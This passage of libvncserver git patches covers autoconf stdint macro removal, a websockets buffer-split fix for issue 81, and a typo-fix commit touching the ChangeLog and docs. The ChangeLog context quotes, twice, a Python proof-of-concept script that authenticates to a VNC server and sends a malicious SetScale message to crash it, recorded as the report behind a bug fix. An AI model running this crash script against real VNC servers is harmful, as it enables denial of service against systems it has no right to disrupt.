inttypes.h sys/inttypes.h stdint.h $inttype_headers, - ac_cv_stdint_result="(seen uint32_t$and64 in $i)") -fi - -if test "_$ac_cv_header_stdint_x" = "_" ; then -if test "_$ac_cv_header_stdint_o" = "_" ; then -AX_CHECK_HEADER_STDINT_U(dnl, - sys/types.h inttypes.h sys/inttypes.h $inttype_headers, - ac_cv_stdint_result="(seen u_int32_t$and64 in $i)") -fi fi - -dnl if there was no good C99 header file, do some typedef checks... -if test "_$ac_cv_header_stdint_x" = "_" ; then - AC_MSG_CHECKING([for stdint datatype model]) - AC_MSG_RESULT([(..)]) - AX_CHECK_DATA_MODEL -fi - -if test "_$ac_cv_header_stdint_x" != "_" ; then - ac_cv_header_stdint="$ac_cv_header_stdint_x" -elif test "_$ac_cv_header_stdint_o" != "_" ; then - ac_cv_header_stdint="$ac_cv_header_stdint_o" -elif test "_$ac_cv_header_stdint_u" != "_" ; then - ac_cv_header_stdint="$ac_cv_header_stdint_u" -else - ac_cv_header_stdint="stddef.h" -fi - -AC_MSG_CHECKING([for extra inttypes in chosen header]) -AC_MSG_RESULT([($ac_cv_header_stdint)]) -dnl see if int_least and int_fast types are present in _this_ header. -unset ac_cv_type_int_least32_t -unset ac_cv_type_int_fast32_t -AC_CHECK_TYPE(int_least32_t,,,[#include <$ac_cv_header_stdint>]) -AC_CHECK_TYPE(int_fast32_t,,,[#include<$ac_cv_header_stdint>]) -AC_CHECK_TYPE(intmax_t,,,[#include <$ac_cv_header_stdint>]) - -fi # shortcircut to system "stdint.h" -# ------------------ PREPARE VARIABLES ------------------------------ -if test "$GCC" = "yes" ; then -ac_cv_stdint_message="using gnu compiler "`$CC --version | head -1` -else -ac_cv_stdint_message="using $CC" -fi - -AC_MSG_RESULT([make use of $ac_cv_header_stdint in $ac_stdint_h dnl -$ac_cv_stdint_result]) - -dnl ----------------------------------------------------------------- -# ----------------- DONE inttypes.h checks START header ------------- -AC_CONFIG_COMMANDS([$ac_stdint_h],[ -AC_MSG_NOTICE(creating $ac_stdint_h : $_ac_stdint_h) -ac_stdint=$tmp/_stdint.h - -echo "#ifndef" $_ac_stdint_h >$ac_stdint -echo "#define" $_ac_stdint_h "1" >>$ac_stdint -echo "#ifndef" _GENERATED_STDINT_H >>$ac_stdint -echo "#define" _GENERATED_STDINT_H '"'$PACKAGE $VERSION'"' >>$ac_stdint -echo "/* generated $ac_cv_stdint_message */" >>$ac_stdint -if test "_$ac_cv_header_stdint_t" != "_" ; then -echo "#define _STDINT_HAVE_STDINT_H" "1" >>$ac_stdint -echo "#include " >>$ac_stdint -echo "#endif" >>$ac_stdint -echo "#endif" >>$ac_stdint -else - -cat >>$ac_stdint < -#else -#include - -/* .................... configured part ............................ */ - -STDINT_EOF - -echo "/* whether we have a C99 compatible stdint header file */" >>$ac_stdint -if test "_$ac_cv_header_stdint_x" != "_" ; then - ac_header="$ac_cv_header_stdint_x" - echo "#define _STDINT_HEADER_INTPTR" '"'"$ac_header"'"' >>$ac_stdint -else - echo "/* #undef _STDINT_HEADER_INTPTR */" >>$ac_stdint -fi - -echo "/* whether we have a C96 compatible inttypes header file */" >>$ac_stdint -if test "_$ac_cv_header_stdint_o" != "_" ; then - ac_header="$ac_cv_header_stdint_o" - echo "#define _STDINT_HEADER_UINT32" '"'"$ac_header"'"' >>$ac_stdint -else - echo "/* #undef _STDINT_HEADER_UINT32 */" >>$ac_stdint -fi - -echo "/* whether we have a BSD compatible inet types header */" >>$ac_stdint -if test "_$ac_cv_header_stdint_u" != "_" ; then - ac_header="$ac_cv_header_stdint_u" - echo "#define _STDINT_HEADER_U_INT32" '"'"$ac_header"'"' >>$ac_stdint -else - echo "/* #undef _STDINT_HEADER_U_INT32 */" >>$ac_stdint -fi - -echo "" >>$ac_stdint - -if test "_$ac_header" != "_" ; then if test "$ac_header" != "stddef.h" ; then - echo "#include <$ac_header>" >>$ac_stdint - echo "" >>$ac_stdint -fi fi - -echo "/* which 64bit typedef has been found */" >>$ac_stdint -if test "$ac_cv_type_uint64_t" = "yes" ; then -echo "#define _STDINT_HAVE_UINT64_T" "1" >>$ac_stdint -else -echo "/* #undef _STDINT_HAVE_UINT64_T */" >>$ac_stdint -fi -if test "$ac_cv_type_u_int64_t" = "yes" ; then -echo "#define _STDINT_HAVE_U_INT64_T" "1" >>$ac_stdint -else -echo "/* #undef _STDINT_HAVE_U_INT64_T */" >>$ac_stdint -fi -echo "" >>$ac_stdint - -echo "/* which type model has been detected */" >>$ac_stdint -if test "_$ac_cv_char_data_model" != "_" ; then -echo "#define _STDINT_CHAR_MODEL" "$ac_cv_char_data_model" >>$ac_stdint -echo "#define _STDINT_LONG_MODEL" "$ac_cv_long_data_model" >>$ac_stdint -else -echo "/* #undef _STDINT_CHAR_MODEL // skipped */" >>$ac_stdint -echo "/* #undef _STDINT_LONG_MODEL // skipped */" >>$ac_stdint -fi -echo "" >>$ac_stdint - -echo "/* whether int_least types were detected */" >>$ac_stdint -if test "$ac_cv_type_int_least32_t" = "yes"; then -echo "#define _STDINT_HAVE_INT_LEAST32_T" "1" >>$ac_stdint -else -echo "/* #undef _STDINT_HAVE_INT_LEAST32_T */" >>$ac_stdint -fi -echo "/* whether int_fast types were detected */" >>$ac_stdint -if test "$ac_cv_type_int_fast32_t" = "yes"; then -echo "#define _STDINT_HAVE_INT_FAST32_T" "1" >>$ac_stdint -else -echo "/* #undef _STDINT_HAVE_INT_FAST32_T */" >>$ac_stdint -fi -echo "/* whether intmax_t type was detected */" >>$ac_stdint -if test "$ac_cv_type_intmax_t" = "yes"; then -echo "#define _STDINT_HAVE_INTMAX_T" "1" >>$ac_stdint -else -echo "/* #undef _STDINT_HAVE_INTMAX_T */" >>$ac_stdint -fi -echo "" >>$ac_stdint - - cat >>$ac_stdint <= 199901L -#define _HAVE_UINT64_T -#define _HAVE_LONGLONG_UINT64_T -typedef long long int64_t; -typedef unsigned long long uint64_t; - -#elif !defined __STRICT_ANSI__ -#if defined _MSC_VER || defined __WATCOMC__ || defined __BORLANDC__ -#define _HAVE_UINT64_T -typedef __int64 int64_t; -typedef unsigned __int64 uint64_t; - -#elif defined __GNUC__ || defined __MWERKS__ || defined __ELF__ -/* note: all ELF-systems seem to have loff-support which needs 64-bit */ -#if !defined _NO_LONGLONG -#define _HAVE_UINT64_T -#define _HAVE_LONGLONG_UINT64_T -typedef long long int64_t; -typedef unsigned long long uint64_t; -#endif - -#elif defined __alpha || (defined __mips && defined _ABIN32) -#if !defined _NO_LONGLONG -typedef long int64_t; -typedef unsigned long uint64_t; -#endif - /* compiler/cpu type to define int64_t */ -#endif -#endif -#endif - -#if defined _STDINT_HAVE_U_INT_TYPES -/* int8_t int16_t int32_t defined by inet code, redeclare the u_intXX types */ -typedef u_int8_t uint8_t; -typedef u_int16_t uint16_t; -typedef u_int32_t uint32_t; - -/* glibc compatibility */ -#ifndef __int8_t_defined -#define __int8_t_defined -#endif -#endif - -#ifdef _STDINT_NEED_INT_MODEL_T -/* we must guess all the basic types. Apart from byte-adressable system, */ -/* there a few 32-bit-only dsp-systems that we guard with BYTE_MODEL 8-} */ -/* (btw, those nibble-addressable systems are way off, or so we assume) */ - -dnl /* have a look at "64bit and data size neutrality" at */ -dnl /* http://unix.org/version2/whatsnew/login_64bit.html */ -dnl /* (the shorthand "ILP" types always have a "P" part) */ - -#if defined _STDINT_BYTE_MODEL -#if _STDINT_LONG_MODEL+0 == 242 -/* 2:4:2 = IP16 = a normal 16-bit system */ -typedef unsigned char uint8_t; -typedef unsigned short uint16_t; -typedef unsigned long uint32_t; -#ifndef __int8_t_defined -#define __int8_t_defined -typedef char int8_t; -typedef short int16_t; -typedef long int32_t; -#endif -#elif _STDINT_LONG_MODEL+0 == 244 || _STDINT_LONG_MODEL == 444 -/* 2:4:4 = LP32 = a 32-bit system derived from a 16-bit */ -/* 4:4:4 = ILP32 = a normal 32-bit system */ -typedef unsigned char uint8_t; -typedef unsigned short uint16_t; -typedef unsigned int uint32_t; -#ifndef __int8_t_defined -#define __int8_t_defined -typedef char int8_t; -typedef short int16_t; -typedef int int32_t; -#endif -#elif _STDINT_LONG_MODEL+0 == 484 || _STDINT_LONG_MODEL+0 == 488 -/* 4:8:4 = IP32 = a 32-bit system prepared for 64-bit */ -/* 4:8:8 = LP64 = a normal 64-bit system */ -typedef unsigned char uint8_t; -typedef unsigned short uint16_t; -typedef unsigned int uint32_t; -#ifndef __int8_t_defined -#define __int8_t_defined -typedef char int8_t; -typedef short int16_t; -typedef int int32_t; -#endif -/* this system has a "long" of 64bit */ -#ifndef _HAVE_UINT64_T -#define _HAVE_UINT64_T -typedef unsigned long uint64_t; -typedef long int64_t; -#endif -#elif _STDINT_LONG_MODEL+0 == 448 -/* LLP64 a 64-bit system derived from a 32-bit system */ -typedef unsigned char uint8_t; -typedef unsigned short uint16_t; -typedef unsigned int uint32_t; -#ifndef __int8_t_defined -#define __int8_t_defined -typedef char int8_t; -typedef short int16_t; -typedef int int32_t; -#endif -/* assuming the system has a "long long" */ -#ifndef _HAVE_UINT64_T -#define _HAVE_UINT64_T -#define _HAVE_LONGLONG_UINT64_T -typedef unsigned long long uint64_t; -typedef long long int64_t; -#endif -#else -#define _STDINT_NO_INT32_T -#endif -#else -#define _STDINT_NO_INT8_T -#define _STDINT_NO_INT32_T -#endif -#endif - -/* - * quote from SunOS-5.8 sys/inttypes.h: - * Use at your own risk. As of February 1996, the committee is squarely - * behind the fixed sized types; the "least" and "fast" types are still being - * discussed. The probability that the "fast" types may be removed before - * the standard is finalized is high enough that they are not currently - * implemented. - */ - -#if defined _STDINT_NEED_INT_LEAST_T -typedef int8_t int_least8_t; -typedef int16_t int_least16_t; -typedef int32_t int_least32_t; -#ifdef _HAVE_UINT64_T -typedef int64_t int_least64_t; -#endif - -typedef uint8_t uint_least8_t; -typedef uint16_t uint_least16_t; -typedef uint32_t uint_least32_t; -#ifdef _HAVE_UINT64_T -typedef uint64_t uint_least64_t; -#endif - /* least types */ -#endif - -#if defined _STDINT_NEED_INT_FAST_T -typedef int8_t int_fast8_t; -typedef int int_fast16_t; -typedef int32_t int_fast32_t; -#ifdef _HAVE_UINT64_T -typedef int64_t int_fast64_t; -#endif - -typedef uint8_t uint_fast8_t; -typedef unsigned uint_fast16_t; -typedef uint32_t uint_fast32_t; -#ifdef _HAVE_UINT64_T -typedef uint64_t uint_fast64_t; -#endif - /* fast types */ -#endif - -#ifdef _STDINT_NEED_INTMAX_T -#ifdef _HAVE_UINT64_T -typedef int64_t intmax_t; -typedef uint64_t uintmax_t; -#else -typedef long intmax_t; -typedef unsigned long uintmax_t; -#endif -#endif - -#ifdef _STDINT_NEED_INTPTR_T -#ifndef __intptr_t_defined -#define __intptr_t_defined -/* we encourage using "long" to store pointer values, never use "int" ! */ -#if _STDINT_LONG_MODEL+0 == 242 || _STDINT_LONG_MODEL+0 == 484 -typedef unsigned int uintptr_t; -typedef int intptr_t; -#elif _STDINT_LONG_MODEL+0 == 244 || _STDINT_LONG_MODEL+0 == 444 -typedef unsigned long uintptr_t; -typedef long intptr_t; -#elif _STDINT_LONG_MODEL+0 == 448 && defined _HAVE_UINT64_T -typedef uint64_t uintptr_t; -typedef int64_t intptr_t; -#else /* matches typical system types ILP32 and LP64 - but not IP16 or LLP64 */ -typedef unsigned long uintptr_t; -typedef long intptr_t; -#endif -#endif -#endif - -/* The ISO C99 standard specifies that in C++ implementations these - should only be defined if explicitly requested. */ -#if !defined __cplusplus || defined __STDC_CONSTANT_MACROS -#ifndef UINT32_C - -/* Signed. */ -# define INT8_C(c) c -# define INT16_C(c) c -# define INT32_C(c) c -# ifdef _HAVE_LONGLONG_UINT64_T -# define INT64_C(c) c ## L -# else -# define INT64_C(c) c ## LL -# endif - -/* Unsigned. */ -# define UINT8_C(c) c ## U -# define UINT16_C(c) c ## U -# define UINT32_C(c) c ## U -# ifdef _HAVE_LONGLONG_UINT64_T -# define UINT64_C(c) c ## UL -# else -# define UINT64_C(c) c ## ULL -# endif - -/* Maximal type. */ -# ifdef _HAVE_LONGLONG_UINT64_T -# define INTMAX_C(c) c ## L -# define UINTMAX_C(c) c ## UL -# else -# define INTMAX_C(c) c ## LL -# define UINTMAX_C(c) c ## ULL -# endif - - /* literalnumbers */ -#endif -#endif - -/* These limits are merily those of a two complement byte-oriented system */ - -/* Minimum of signed integral types. */ -# define INT8_MIN (-128) -# define INT16_MIN (-32767-1) -# define INT32_MIN (-2147483647-1) -# define INT64_MIN (-__INT64_C(9223372036854775807)-1) -/* Maximum of signed integral types. */ -# define INT8_MAX (127) -# define INT16_MAX (32767) -# define INT32_MAX (2147483647) -# define INT64_MAX (__INT64_C(9223372036854775807)) - -/* Maximum of unsigned integral types. */ -# define UINT8_MAX (255) -# define UINT16_MAX (65535) -# define UINT32_MAX (4294967295U) -# define UINT64_MAX (__UINT64_C(18446744073709551615)) - -/* Minimum of signed integral types having a minimum size. */ -# define INT_LEAST8_MIN INT8_MIN -# define INT_LEAST16_MIN INT16_MIN -# define INT_LEAST32_MIN INT32_MIN -# define INT_LEAST64_MIN INT64_MIN -/* Maximum of signed integral types having a minimum size. */ -# define INT_LEAST8_MAX INT8_MAX -# define INT_LEAST16_MAX INT16_MAX -# define INT_LEAST32_MAX INT32_MAX -# define INT_LEAST64_MAX INT64_MAX - -/* Maximum of unsigned integral types having a minimum size. */ -# define UINT_LEAST8_MAX UINT8_MAX -# define UINT_LEAST16_MAX UINT16_MAX -# define UINT_LEAST32_MAX UINT32_MAX -# define UINT_LEAST64_MAX UINT64_MAX - - /* shortcircuit*/ -#endif - /* once */ -#endif -#endif -STDINT_EOF -fi - if cmp -s $ac_stdint_h $ac_stdint 2>/dev/null; then - AC_MSG_NOTICE([$ac_stdint_h is unchanged]) - else - ac_dir=`AS_DIRNAME(["$ac_stdint_h"])` - AS_MKDIR_P(["$ac_dir"]) - rm -f $ac_stdint_h - mv $ac_stdint $ac_stdint_h - fi -],[# variables for create stdint.h replacement -PACKAGE="$PACKAGE" -VERSION="$VERSION" -ac_stdint_h="$ac_stdint_h" -_ac_stdint_h=AS_TR_CPP(_$PACKAGE-$ac_stdint_h) -ac_cv_stdint_message="$ac_cv_stdint_message" -ac_cv_header_stdint_t="$ac_cv_header_stdint_t" -ac_cv_header_stdint_x="$ac_cv_header_stdint_x" -ac_cv_header_stdint_o="$ac_cv_header_stdint_o" -ac_cv_header_stdint_u="$ac_cv_header_stdint_u" -ac_cv_type_uint64_t="$ac_cv_type_uint64_t" -ac_cv_type_u_int64_t="$ac_cv_type_u_int64_t" -ac_cv_char_data_model="$ac_cv_char_data_model" -ac_cv_long_data_model="$ac_cv_long_data_model" -ac_cv_type_int_least32_t="$ac_cv_type_int_least32_t" -ac_cv_type_int_fast32_t="$ac_cv_type_int_fast32_t" -ac_cv_type_intmax_t="$ac_cv_type_intmax_t" -]) -]) diff --git a/rfb/rfbproto.h b/rfb/rfbproto.h index d2b8235..9b082dd 100644 --- a/rfb/rfbproto.h +++ b/rfb/rfbproto.h @@ -70,7 +70,6 @@ #define SOCKET int #else #include -#include #endif #ifdef LIBVNCSERVER_HAVE_LIBZ @@ -108,9 +107,7 @@ typedef int8_t rfbBool; #define TRUE -1 #endif -#ifdef _MSC_VER #include -#endif typedef uint32_t rfbKeySym; typedef uint32_t rfbPixel; -- cgit v1.2.3 From 455ba61e4fdc9f2696832137f52c0ae51aeb9004 Mon Sep 17 00:00:00 2001 From: plettix Date: Tue, 7 Jul 2015 10:32:16 +0200 Subject: fix for issue 81 use different buffers for decode and encode --- libvncserver/websockets.c | 32 +++++++++++++++++--------------- 1 file changed, 17 insertions(+), 15 deletions(-) (limited to 'libvncserver') diff --git a/libvncserver/websockets.c b/libvncserver/websockets.c index 3585ed5..b5d99fc 100644 --- a/libvncserver/websockets.c +++ b/libvncserver/websockets.c @@ -79,8 +79,9 @@ typedef int (*wsEncodeFunc)(rfbClientPtr cl, const char *src, int len, char **ds typedef int (*wsDecodeFunc)(rfbClientPtr cl, char *dst, int len); typedef struct ws_ctx_s { - char codeBuf[B64LEN(UPDATE_BUF_SIZE) + WSHLENMAX]; /* base64 + maximum frame header length */ - char readbuf[8192]; + char codeBufDecode[B64LEN(UPDATE_BUF_SIZE) + WSHLENMAX]; /* base64 + maximum frame header length */ + char codeBufEncode[B64LEN(UPDATE_BUF_SIZE) + WSHLENMAX]; /* base64 + maximum frame header length */ + char readbuf[8192]; int readbufstart; int readbuflen; int dblen; @@ -490,15 +491,15 @@ webSocketsEncodeHixie(rfbClientPtr cl, const char *src, int len, char **dst) int sz = 0; ws_ctx_t *wsctx = (ws_ctx_t *)cl->wsctx; - wsctx->codeBuf[sz++] = '\x00'; - len = __b64_ntop((unsigned char *)src, len, wsctx->codeBuf+sz, sizeof(wsctx->codeBuf) - (sz + 1)); + wsctx->codeBufEncode[sz++] = '\x00'; + len = __b64_ntop((unsigned char *)src, len, wsctx->codeBufEncode+sz, sizeof(wsctx->codeBufEncode) - (sz + 1)); if (len < 0) { return len; } sz += len; - wsctx->codeBuf[sz++] = '\xff'; - *dst = wsctx->codeBuf; + wsctx->codeBufEncode[sz++] = '\xff'; + *dst = wsctx->codeBufEncode; return sz; } @@ -536,7 +537,7 @@ webSocketsDecodeHixie(rfbClientPtr cl, char *dst, int len) char *buf, *end = NULL; ws_ctx_t *wsctx = (ws_ctx_t *)cl->wsctx; - buf = wsctx->codeBuf; + buf = wsctx->codeBufDecode; n = ws_peek(cl, buf, len*2+2); @@ -657,8 +658,8 @@ webSocketsDecodeHybi(rfbClientPtr cl, char *dst, int len) goto spor; } - buf = wsctx->codeBuf; - header = (ws_header_t *)wsctx->codeBuf; + buf = wsctx->codeBufDecode; + header = (ws_header_t *)wsctx->codeBufDecode; ret = ws_peek(cl, buf, B64LEN(len) + WSHLENMAX); @@ -742,11 +743,11 @@ webSocketsDecodeHybi(rfbClientPtr cl, char *dst, int len) errno = ECONNRESET; break; case WS_OPCODE_TEXT_FRAME: - if (-1 == (flength = __b64_pton(payload, (unsigned char *)wsctx->codeBuf, sizeof(wsctx->codeBuf)))) { + if (-1 == (flength = __b64_pton(payload, (unsigned char *)wsctx->codeBufDecode, sizeof(wsctx->codeBufDecode)))) { rfbErr("%s: Base64 decode error; %m\n", __func__); break; } - payload = wsctx->codeBuf; + payload = wsctx->codeBufDecode; /* fall through */ case WS_OPCODE_BINARY_FRAME: if (flength > len) { @@ -790,7 +791,7 @@ webSocketsEncodeHybi(rfbClientPtr cl, const char *src, int len, char **dst) return 0; } - header = (ws_header_t *)wsctx->codeBuf; + header = (ws_header_t *)wsctx->codeBufEncode; if (wsctx->base64) { opcode = WS_OPCODE_TEXT_FRAME; @@ -816,7 +817,7 @@ webSocketsEncodeHybi(rfbClientPtr cl, const char *src, int len, char **dst) } if (wsctx->base64) { - if (-1 == (ret = __b64_ntop((unsigned char *)src, len, wsctx->codeBuf + sz, sizeof(wsctx->codeBuf) - sz))) { + if (-1 == (ret = __b64_ntop((unsigned char *)src, len, wsctx->codeBufEncode + sz, sizeof(wsctx->codeBufEncode) - sz))) { rfbErr("%s: Base 64 encode failed\n", __func__); } else { if (ret != blen) @@ -824,11 +825,12 @@ webSocketsEncodeHybi(rfbClientPtr cl, const char *src, int len, char **dst) ret += sz; } } else { - memcpy(wsctx->codeBuf + sz, src, len); + memcpy(wsctx->codeBufEncode + sz, src, len); ret = sz + len; } - *dst = wsctx->codeBuf; + *dst = wsctx->codeBufEncode; + return ret; } -- cgit v1.2.3 From 9c7efb7633ba62cd80c93e83284663f805bb3031 Mon Sep 17 00:00:00 2001 From: Stefan Weil Date: Fri, 9 Oct 2015 17:13:35 +0200 Subject: Fix some typos (found by codespell) Signed-off-by: Stefan Weil --- ChangeLog | 26 +++++++++++----------- Doxyfile | 2 +- NEWS | 4 ++-- README | 8 +++---- client_examples/vnc2mpg.c | 6 ++--- common/zywrletemplate.c | 2 +- examples/camera.c | 4 ++-- libvncclient/listen.c | 2 +- libvncclient/sockets.c | 2 +- libvncserver/cargs.c | 2 +- libvncserver/scale.c | 4 ++-- libvncserver/sockets.c | 2 +- libvncserver/tight.c | 2 +- .../tightvnc-filetransfer/filetransfermsg.c | 4 ++-- .../handlefiletransferrequest.c | 2 +- libvncserver/tightvnc-filetransfer/rfbtightproto.h | 2 +- .../tightvnc-filetransfer/rfbtightserver.c | 2 +- libvncserver/ultra.c | 2 +- libvncserver/zlib.c | 2 +- rfb/keysym.h | 4 ++-- rfb/rfb.h | 6 ++--- rfb/rfbproto.h | 2 +- webclients/java-applet/ssl/README | 6 ++--- webclients/java-applet/ssl/proxy.vnc | 2 +- webclients/java-applet/ssl/ss_vncviewer | 10 ++++----- .../ssl/ultravnc-102-JavaViewer-ssl-etc.patch | 6 ++--- webclients/novnc/include/display.js | 2 +- webclients/novnc/include/rfb.js | 2 +- webclients/novnc/include/ui.js | 2 +- 29 files changed, 61 insertions(+), 61 deletions(-) (limited to 'libvncserver') diff --git a/ChangeLog b/ChangeLog index 3953dd4..510ab06 100644 --- a/ChangeLog +++ b/ChangeLog @@ -37,7 +37,7 @@ (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7]))crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py - [password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap--- + [password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occurred.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap--- 2014-10-14 dscho @@ -1361,7 +1361,7 @@ * libvncserver/Makefile.am: Fix build error when libpng is available, but libjpeg is not. The png stuff in tight.c depends on code in tight.c that uses - libjpeg features. We could probably seperate that, but for now the + libjpeg features. We could probably separate that, but for now the dependency for 'tight' goes: PNG depends on JPEG depends on ZLIB. This is reflected in Makefile.am now. NB: Building tight.c with JPEG but without PNG is still possible, but nor the other way around. 2011-12-01 Christian Beier @@ -1527,10 +1527,10 @@ 2011-10-16 George Fleury * libvncserver/rfbserver.c: Fix memory leak I was debbuging some code tonight and i found a pointer that is not - been freed, so i think there is maybe a memory leak, so it is... there is the malloc caller reverse order: ( malloc cl->statEncList ) <- rfbStatLookupEncoding <- rfbStatRecordEncodingSent <- rfbSendCursorPos <- rfbSendFramebufferUpdate <- rfbProcessEvents I didnt look the whole libvncserver api, but i am using + been freed, so i think there is maybe a memory leak, so it is... there is the malloc caller reverse order: ( malloc cl->statEncList ) <- rfbStatLookupEncoding <- rfbStatRecordEncodingSent <- rfbSendCursorPos <- rfbSendFramebufferUpdate <- rfbProcessEvents I didn't look the whole libvncserver api, but i am using rfbReverseConnection with rfbProcessEvents, and then when the client connection dies, i am calling a rfbShutdownServer and - rfbScreenCleanup, but the malloc at rfbStatLookupEncoding isnt been + rfbScreenCleanup, but the malloc at rfbStatLookupEncoding isn't been freed. So to free the stats i added a rfbResetStats(cl) after rfbPrintStats(cl) at rfbClientConnectionGone in rfbserver.c before free the cl pointer. (at rfbserver.c line 555). And this, obviously, @@ -1685,7 +1685,7 @@ 2011-08-25 Gernot Tenchio * libvncserver/websockets.c: websockets: added gcrypt based sha1 - digest funtion + digest function 2011-08-25 Joel Martin @@ -1901,7 +1901,7 @@ 2010-11-10 George Kiagiadakis - * libvncserver/tight.c: Fix memory corruption bug. This bug occured when a second telepathy tubes client was connected + * libvncserver/tight.c: Fix memory corruption bug. This bug occurred when a second telepathy tubes client was connected after the first one had disconnected and the channel (thus, the screen too) had been destroyed. Signed-off-by: Johannes Schindelin @@ -2070,7 +2070,7 @@ common/minilzo.h, libvncclient/Makefile.am, libvncserver/Makefile.am: Update minilzo library used for Ultra encoding to ver 2.04. According to the minilzo README, this brings a significant speedup - on 64-bit architechtures. Changes compared to old version 1.08 can be found here: + on 64-bit architectures. Changes compared to old version 1.08 can be found here: http://www.oberhumer.com/opensource/lzo/lzonews.php Signed-off-by: Christian Beier 2011-01-24 Christian Beier @@ -3209,7 +3209,7 @@ x11vnc/sslhelper.c, x11vnc/ssltools.h, x11vnc/user.c, x11vnc/user.h, x11vnc/x11vnc.1, x11vnc/x11vnc_defs.c: Allow range for X11VNC_SKIP_DISPLAY, document grab Xserver issue. Add - progress_client() to proceed more quickly thru handshake. + progress_client() to proceed more quickly through handshake. Improvements to turbovnc hack. 2009-03-07 dscho @@ -5601,7 +5601,7 @@ x11vnc/sslcmds.h, x11vnc/sslhelper.c, x11vnc/sslhelper.h, x11vnc/ssltools.h, x11vnc/tkx11vnc, x11vnc/tkx11vnc.h, x11vnc/x11vnc.1, x11vnc/x11vnc.c, x11vnc/x11vnc.h, - x11vnc/x11vnc_defs.c: SSL Java viewer work thru proxy. -sslGenCA, etc key/cert + x11vnc/x11vnc_defs.c: SSL Java viewer work through proxy. -sslGenCA, etc key/cert management utils for x11vnc. FBPM "support". 2006-03-28 dscho @@ -6760,7 +6760,7 @@ * AUTHORS, libvncclient/listen.c, libvncclient/sockets.c, libvncclient/vncviewer.c: use rfbClientErr to log errors, check if - calloc succeded (both hinted by Andre Leiradella) + calloc succeeded (both hinted by Andre Leiradella) 2004-11-30 dscho @@ -7442,7 +7442,7 @@ 2003-08-03 dscho * rfb/rfbproto.h: forgot to change WORDS_BIGENDIAN to - LIBVNCSERVER_BIGENDIAN; #undef VERSION unneccessary... + LIBVNCSERVER_BIGENDIAN; #undef VERSION unnecessary... 2003-08-02 dscho @@ -8285,7 +8285,7 @@ 2001-10-15 dscho - * .gdb_history: unneccessary file + * .gdb_history: unnecessary file 2001-10-13 dscho @@ -8536,7 +8536,7 @@ 2001-09-25 dscho - * .depend: rmoved unneccessary files + * .depend: rmoved unnecessary files 2001-09-25 dscho diff --git a/Doxyfile b/Doxyfile index 09c6fcc..c255d51 100644 --- a/Doxyfile +++ b/Doxyfile @@ -292,7 +292,7 @@ TYPEDEF_HIDES_STRUCT = YES # causing a significant performance penality. # If the system has enough physical memory increasing the cache will improve the # performance by keeping more symbols in memory. Note that the value works on -# a logarithmic scale so increasing the size by one will rougly double the +# a logarithmic scale so increasing the size by one will roughly double the # memory usage. The cache size is given by this formula: # 2^(16+SYMBOL_CACHE_SIZE). The valid range is 0..9, the default is 0, # corresponding to a cache size of 2^16 = 65536 symbols diff --git a/NEWS b/NEWS index 6a838c6..9708ce3 100644 --- a/NEWS +++ b/NEWS @@ -80,7 +80,7 @@ * Implemented xvp VNC extension. * Updated minilzo library used for Ultra encoding to ver 2.04. According to the minilzo README, this brings a significant - speedup on 64-bit architechtures. + speedup on 64-bit architectures. - LibVNCServer: * Thread safety for ZRLE, Zlib, Tight, RRE, CoRRE and Ultra encodings. @@ -131,7 +131,7 @@ - Print this string out to stdout: 'PORT=XXXX' (usually XXXX = 5900). Combining with -bg, easy to write a ssh/rsh wrapper with something like: port=`ssh $host "x11vnc -bg .."` then run vncviewer based on $port output. - (tunneling the vnc traffic thru ssh a bit more messy, but doable) + (tunneling the vnc traffic through ssh a bit more messy, but doable) - Quite a bit of code to be more careful when doing 8bpp indexed color, e.g. not assuming NCOLORS is 256, handling 8bit TrueColor and Direct Color, etc diff --git a/README b/README index dfcdc8c..1b4e6f4 100644 --- a/README +++ b/README @@ -24,7 +24,7 